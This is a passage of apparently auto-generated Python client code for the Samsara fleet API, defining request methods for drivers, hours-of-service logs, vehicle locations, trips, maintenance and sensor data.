# verify the required parameter 'get_dispatch_jobs_param' is set
if ('get_dispatch_jobs_param' not in params) or (params['get_dispatch_jobs_param'] is None):
raise ValueError("Missing the required parameter `get_dispatch_jobs_param` when calling `get_fleet_dispatch_jobs`")
collection_formats = {}
resource_path = '/fleet/dispatch_jobs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_dispatch_jobs_param' in params:
body_params = params['get_dispatch_jobs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DispatchJobsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_drivers(self, access_token, group_drivers_param, **kwargs):
"""
/fleet/drivers
Get all the drivers for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers(access_token, group_drivers_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupDriversParam group_drivers_param: (required)
:return: DriversRespose
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_drivers_with_http_info(access_token, group_drivers_param, **kwargs)
else:
(data) = self.get_fleet_drivers_with_http_info(access_token, group_drivers_param, **kwargs)
return data
def get_fleet_drivers_with_http_info(self, access_token, group_drivers_param, **kwargs):
"""
/fleet/drivers
Get all the drivers for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers_with_http_info(access_token, group_drivers_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupDriversParam group_drivers_param: (required)
:return: DriversRespose
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_drivers_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_drivers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_drivers`")
# verify the required parameter 'group_drivers_param' is set
if ('group_drivers_param' not in params) or (params['group_drivers_param'] is None):
raise ValueError("Missing the required parameter `group_drivers_param` when calling `get_fleet_drivers`")
collection_formats = {}
resource_path = '/fleet/drivers'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_drivers_param' in params:
body_params = params['group_drivers_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DriversRespose',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_drivers_summary(self, access_token, drivers_summary_param, **kwargs):
"""
/fleet/drivers/summary
Get the distance and time each driver in an organization has driven in a given time period.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers_summary(access_token, drivers_summary_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param DriversSummaryParam drivers_summary_param: Org ID and time range to query. (required)
:return: DriversSummaryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_drivers_summary_with_http_info(access_token, drivers_summary_param, **kwargs)
else:
(data) = self.get_fleet_drivers_summary_with_http_info(access_token, drivers_summary_param, **kwargs)
return data
def get_fleet_drivers_summary_with_http_info(self, access_token, drivers_summary_param, **kwargs):
"""
/fleet/drivers/summary
Get the distance and time each driver in an organization has driven in a given time period.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers_summary_with_http_info(access_token, drivers_summary_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param DriversSummaryParam drivers_summary_param: Org ID and time range to query. (required)
:return: DriversSummaryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'drivers_summary_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_drivers_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_drivers_summary`")
# verify the required parameter 'drivers_summary_param' is set
if ('drivers_summary_param' not in params) or (params['drivers_summary_param'] is None):
raise ValueError("Missing the required parameter `drivers_summary_param` when calling `get_fleet_drivers_summary`")
collection_formats = {}
resource_path = '/fleet/drivers/summary'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'drivers_summary_param' in params:
body_params = params['drivers_summary_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DriversSummaryResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_hos_authentication_logs(self, access_token, hos_authentication_logs_param, **kwargs):
"""
/fleet/hos_authentication_logs
Get the HOS (hours of service) signin and signout logs for the specified driver. Only signout logs include location information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_authentication_logs(access_token, hos_authentication_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosAuthenticationLogsParam hos_authentication_logs_param: (required)
:return: HosAuthenticationLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_hos_authentication_logs_with_http_info(access_token, hos_authentication_logs_param, **kwargs)
else:
(data) = self.get_fleet_hos_authentication_logs_with_http_info(access_token, hos_authentication_logs_param, **kwargs)
return data
def get_fleet_hos_authentication_logs_with_http_info(self, access_token, hos_authentication_logs_param, **kwargs):
"""
/fleet/hos_authentication_logs
Get the HOS (hours of service) signin and signout logs for the specified driver. Only signout logs include location information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_authentication_logs_with_http_info(access_token, hos_authentication_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosAuthenticationLogsParam hos_authentication_logs_param: (required)
:return: HosAuthenticationLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'hos_authentication_logs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_hos_authentication_logs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_hos_authentication_logs`")
# verify the required parameter 'hos_authentication_logs_param' is set
if ('hos_authentication_logs_param' not in params) or (params['hos_authentication_logs_param'] is None):
raise ValueError("Missing the required parameter `hos_authentication_logs_param` when calling `get_fleet_hos_authentication_logs`")
collection_formats = {}
resource_path = '/fleet/hos_authentication_logs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'hos_authentication_logs_param' in params:
body_params = params['hos_authentication_logs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HosAuthenticationLogsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_hos_logs(self, access_token, hos_logs_param, **kwargs):
"""
/fleet/hos_logs
Get the HOS (hours of service) logs for the specified driver.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_logs(access_token, hos_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosLogsParam hos_logs_param: (required)
:return: HosLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_hos_logs_with_http_info(access_token, hos_logs_param, **kwargs)
else:
(data) = self.get_fleet_hos_logs_with_http_info(access_token, hos_logs_param, **kwargs)
return data
def get_fleet_hos_logs_with_http_info(self, access_token, hos_logs_param, **kwargs):
"""
/fleet/hos_logs
Get the HOS (hours of service) logs for the specified driver.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_logs_with_http_info(access_token, hos_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosLogsParam hos_logs_param: (required)
:return: HosLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'hos_logs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_hos_logs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_hos_logs`")
# verify the required parameter 'hos_logs_param' is set
if ('hos_logs_param' not in params) or (params['hos_logs_param'] is None):
raise ValueError("Missing the required parameter `hos_logs_param` when calling `get_fleet_hos_logs`")
collection_formats = {}
resource_path = '/fleet/hos_logs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'hos_logs_param' in params:
body_params = params['hos_logs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HosLogsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_locations(self, access_token, group_param, **kwargs):
"""
/fleet/locations
Get current location of vehicles in a group. This method returns the current location in latitude and longitude of all vehicles in a requested group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_locations(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_locations_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_fleet_locations_with_http_info(access_token, group_param, **kwargs)
return data
def get_fleet_locations_with_http_info(self, access_token, group_param, **kwargs):
"""
/fleet/locations
Get current location of vehicles in a group. This method returns the current location in latitude and longitude of all vehicles in a requested group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_locations_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_locations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_locations`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_fleet_locations`")
collection_formats = {}
resource_path = '/fleet/locations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_maintenance_list(self, access_token, group_param, **kwargs):
"""
/fleet/maintenance/list
Get list of the vehicles with any engine faults or check light data.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_maintenance_list(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_maintenance_list_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_fleet_maintenance_list_with_http_info(access_token, group_param, **kwargs)
return data
def get_fleet_maintenance_list_with_http_info(self, access_token, group_param, **kwargs):
"""
/fleet/maintenance/list
Get list of the vehicles with any engine faults or check light data.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_maintenance_list_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_maintenance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_maintenance_list`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_fleet_maintenance_list`")
collection_formats = {}
resource_path = '/fleet/maintenance/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2003',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_trips(self, access_token, trips_param, **kwargs):
"""
/fleet/trips
Get historical trips data for specified vehicle. This method returns a set of historical trips data for the specified vehicle in the specified time range.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_trips(access_token, trips_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param TripsParam trips_param: Group ID, vehicle ID and time range to query. (required)
:return: TripResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_trips_with_http_info(access_token, trips_param, **kwargs)
else:
(data) = self.get_fleet_trips_with_http_info(access_token, trips_param, **kwargs)
return data
def get_fleet_trips_with_http_info(self, access_token, trips_param, **kwargs):
"""
/fleet/trips
Get historical trips data for specified vehicle. This method returns a set of historical trips data for the specified vehicle in the specified time range.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_trips_with_http_info(access_token, trips_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param TripsParam trips_param: Group ID, vehicle ID and time range to query. (required)
:return: TripResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'trips_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_trips" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_trips`")
# verify the required parameter 'trips_param' is set
if ('trips_param' not in params) or (params['trips_param'] is None):
raise ValueError("Missing the required parameter `trips_param` when calling `get_fleet_trips`")
collection_formats = {}
resource_path = '/fleet/trips'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'trips_param' in params:
body_params = params['trips_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TripResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_sensors_with_http_info(access_token, group_param, **kwargs)
return data
def get_sensors_with_http_info(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_sensors`")
collection_formats = {}
resource_path = '/sensors/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_history(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_history(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
else:
(data) = self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
return data
def get_sensors_history_with_http_info(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_history_with_http_info(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'history_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_history`")
# verify the required parameter 'history_param' is set
if ('history_param' not in params) or (params['history_param'] is None):
raise ValueError("Missing the required parameter `history_param` when calling `get_sensors_history`")
collection_formats = {}
resource_path = '/sensors/history'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'history_param' in params:
body_params = params['history_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SensorHistoryResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_humidity(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_humidity_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_humidity" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_humidity`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_humidity`")
collection_formats = {}
resource_path = '/sensors/humidity'.replace('{format}', 'json')
path_params = {}
query_params = {}
